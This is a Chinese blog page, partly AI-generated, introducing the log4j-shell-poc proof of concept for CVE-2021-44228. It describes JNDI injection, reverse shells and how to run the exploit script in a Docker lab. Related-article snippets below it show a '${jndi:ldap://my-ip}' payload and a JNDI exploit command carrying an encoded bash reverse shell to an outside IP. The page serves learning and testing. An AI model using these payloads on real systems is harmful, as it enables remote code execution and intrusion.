探索CVE-2021-44228漏洞:log4j-shell-poc详解与实战

最新推荐文章于 2025-04-21 09:56:17 发布
最新推荐文章于 2025-04-21 09:56:17 发布
阅读量479 收藏 7
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00393/article/details/141121594
版权

探索CVE-2021-44228漏洞:log4j-shell-poc详解与实战

项目地址:https://gitcode.com/gh_mirrors/lo/log4j-shell-poc

项目简介

log4j-shell-poc 是一个针对近期曝光的严重安全漏洞CVE-2021-44228的验证实例。这个漏洞影响了广泛使用的Java日志库——log4j,包括Elasticsearch、Minecraft在内的众多应用程序都可能受到其威胁。

本项目提供了一个易受攻击的应用示例,并包含了自动化利用脚本,帮助开发者理解漏洞原理并进行测试。

技术分析

此PoC(Proof-of-Concept)利用的是Java语言中的JNDI注入漏洞。通过构造特定的日志字符串,攻击者可以远程控制服务器,实现反向shell。Python脚本poc.py负责启动HTTP和LDAP服务器,创建payload,并自动化执行攻击流程。

要运行此PoC,确保已下载名为jdk1.8.0_20的Java版本,置于项目目录下。然后,使用python3 poc.py命令指定用户IP、Web端口和监听端口。

应用场景

这个项目对于以下几类人群尤其有价值:

  1. 软件开发者:想要了解如何保护自己的应用免受该漏洞的影响。
  2. 安全研究人员:需要验证目标系统是否受到此漏洞威胁。
  3. 系统管理员:对正在运行的Java应用进行安全审计。

你可以通过Dockerfile构建一个易受攻击的Web应用环境,以模拟真实环境下的漏洞利用。

项目特点

  1. 自动化工具:通过Python脚本简化了漏洞利用的过程,无需手动配置多个服务。
  2. 交互式体验:清晰的命令行指示和反馈,使得操作过程直观明了。
  3. Docker支持:使用Docker容器化部署,方便复现问题,降低环境配置难度。
  4. 教育目的:旨在提高用户对网络安全的认识,同时提供测试自身应用程序安全性的机会。

请注意,此项目不建议用于非法活动,而是为了学习和测试目的。在使用过程中,请遵守法律法规,尊重他人的隐私和安全。

总的来说,log4j-shell-poc 是一个强大且实用的教育资源,帮助我们更好地理解和应对当前的安全挑战。如果你对这个漏洞感兴趣或者需要对其深入研究,那么这个项目绝对值得你一试。立即行动起来,提升你的安全意识和防护技能!

log4j-shell-poc A Proof-Of-Concept for the CVE-2021-44228 vulnerability. log4j-shell-poc 项目地址: https://gitcode.com/gh_mirrors/lo/log4j-shell-poc

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

Apache Log4j代码执行漏洞(CVE-2021-44228)
weixin_45808483的博客
12-14 8120
前言: 12 月 10 日凌晨,Apache 开源项目 Log4j2 的远程代码执行漏洞细节被公开,漏洞威胁等级为:严重。 Log4j2 是一个基于 Java 的日志记录工具。它重写了 Log4j 框架,引入了大量丰富特性,让用户可以控制日志信息输送的目的地为控制台、文件、GUI 组件等。同时通过定义每一条日志信息的级别,让使用者能够更加细致地控制日志的生成过程。 Log4j 是目前全球使用最广泛的 java 日志框架之一。该漏洞还影响着很多全球使用量前列的开源组件,如 Apache Struts2、
log4j2漏洞复现
The_Epiphany的博客
04-19 468
1.该漏洞的主要成因是LDAP对外部站点资源的访问,导致下载恶意代码,可以禁止lookup的出栈查询。2.对"jndi:ladp://"、“jndi:rmi”等特征字符过滤。3.限制对外网的访问。4.配置jndi可调用协议。
Struts2 CVE-2021-44228 log4j POC
不光要学,知识要能说出口
12-28 3032
随着log4j漏洞的出现,众多框架受到影响,大家都在研究不同框架的利用点在何处,下面总结的是Struts2目前的poc
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 3371
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
Apache Log4j2远程代码执行漏洞复现 CVE-2021-44228,python编写POC
wangqiao258的博客
12-15 5985
环境搭建: 使用docker拉取: [root@www /]# docker pull vulfocus/log4j2-rce-2021-12-09 运行: [root@www /]# docker run -P vulfocus/log4j2-rce-2021-12-09 查看端口: [root@www ]# docker ps CONTAINER ID IMAGE
Log4j远程代码执行漏洞CVE-2021-44228漏洞复现
热门推荐
鸥鹭忘机
12-11 1万+
基本信息 漏洞编号:CVE-2021-44228 影响版本:2.x<=2.15.0-rc1 poc地址:https://gitee.com/lcosmos/apache-log4j-poc 在此十分感谢我的寝室长Cosmos提供的poc和技术支持。 原理简述 当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,程序就会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行。 漏洞
Apache Log4j2 RCE漏洞复现(CVE-2021-44228)
SuperherRo的博客
10-31 821
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过 该漏洞构造特殊的数据请求包,最终触发远程代码执行。
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
zz12345600354的博客
04-26 913
目录 服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP * 概述 PHP-开发框架安全-Thinkphp&Laravel * 漏洞复现 * Thinkphp-3.X RCE Thinkphp-5.X RCE Laravel框架安全问题- CVE-2021-3129 RCE JAVAWEB-开发框架安全-Spring&Struts2 * Struts2框架安全
CVE-2021-29454——Smarty模板注入
HBohan的博客
04-01 1707
漏洞报告 Smarty 是 PHP 的模板引擎,有助于将表示 (HTML/CSS) 应用程序逻辑分离。在 3.1.42 和 4.0.2 版本之前,模板作者可以通过制作恶意数学字符串来运行任意 PHP 代码。如果数学字符串作为用户提供的数据传递给数学函数,则外部用户可以通过制作恶意数学字符串来运行任意 PHP 代码。用户应升级到版本 3.1.42 或 4.0.2 以接收补丁。 源码分析 对比官方修复的代码,在/plugins/function.math.php添加了如下一段 // Remove whites
红队专题-漏洞挖掘-代码审计-CSRF/SSRF/Xss
aming小老弟
03-11 1078
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
log4j_trunctate_poc:poc 测试如何截断堆栈跟踪
06-05
log4j_trunctate_poc poc 测试如何截断堆栈跟踪 介绍 Log4j 从 1.2.16 开始附带一个EnhancedPatternLayout类。 EnhancedPatternLayout能够截断堆栈跟踪消息,因此它们不会填满日志文件。 要启用此功能,对于每个输出,您需要修改从PatternLayout到EnhancedPatternLayout switch,并向ConversionPattern添加一个额外的标志。 作为一个例子改变这个: log4j.appender.CONSOLE.layout=org.apache.log4j.EnhancedPatternLayout log4j.appender.CONSOLE.layout.ConversionPattern=%-4r [%t] %-5p %c %x \u2013 %m%n %throwable
红队专题-漏洞挖掘-代码审计-反序列化
aming小老弟
04-21 1937
TransformedMap⽤于对Java标准数据结构Map做⼀个修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。super(map);
JAVA安全--log4j漏洞研究分析
goddemon
03-12 1万+
log4j漏洞复现 复现 这里以bugku上的靶场为例进行复现 https://ctf.bugku.com/challenges/detail/id/340.html 环境配置 ①ldap服务 服务器起一个ldap服务就好了 直接执行反弹shell 即直接配置bash反弹shell命令 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuM
Log4j2漏洞执行
weixin_43684022的博客
12-11 2978
标题@TOC 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示;
log4j2 RCE漏洞复现,2024年最新近期想跳槽的程序员必看
2301_79054215的博客
04-13 246
可以看到这边又出现了一个java的一个版本号信息:1.8.0_312。得到ok,显示payload=111。修改poc语句,都是可以成功回显所要验证的信息的。创建临时域名:2oaj3e.dnslog.cn。该域名显示被如下IP地址访问。
Log4j远程代码执行漏洞环境搭建及复现
m0_71263989的博客
02-20 1994
Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。它是 Log4j 的升级版本,相比于 Log4jLog4j2 在性能、可靠性和灵活性方面都有显著的改进。
log4j历史漏洞复现
weixin_53747497的博客
04-02 1401
Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。该工具重写了 log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组 建等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目 标服务器上执行任意代码。
手把手复现了 Log4j2 漏洞,太可怕了。。
Java技术栈,分享最主流的Java技术
12-14 2925
来源:blog.csdn.net/qq_40989258/article/details/121862363 0x00 简介 ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架Web应用中。 0x01 漏洞概述 该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。 0x02 影响范围 Apache Log4j 2.x <= 2.15.0-rc1 0x03 环境搭建 创建一个新的
一文读懂面试官都在问的Log4J2漏洞
YangYubo091699的博客
04-11 6143
​ Apache log4j2-RCE 漏洞是由于Log4j2提供的lookup功能下的JndiLookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的信息进行判断,导致Log4j2请求远程主机上的含有恶意代码的资源 并执行其中的代码,从而造成远程代码执行漏洞。​
建设项目管理-勘查设计管理.ppt
最新发布
05-28
建设项目管理-勘查设计管理.ppt
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

史琼鸽Power

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值